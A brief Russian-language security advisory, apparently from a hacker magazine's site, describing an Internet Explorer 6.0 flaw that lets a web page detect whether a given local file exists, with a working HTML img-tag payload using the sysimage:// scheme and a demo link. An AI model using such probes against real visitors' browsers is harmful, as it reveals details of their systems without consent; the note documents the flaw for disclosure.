Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Internet Explorer 6.0 SP1 + Win2k SP4 позволяет
обнаруживать наличие файлов на локальной
машине.
Пример:
<img src="sysimage://C:\WINNT\Notepad.exe,666" onLoad="document.write('<b>Cannot
Find File!</b>');" onError="document.write('<b>File Exists!</b>');">
Демо:
http://crapware.lx.ro/junkcode/security/ie-sp1-sysimage-local-file-existence.htm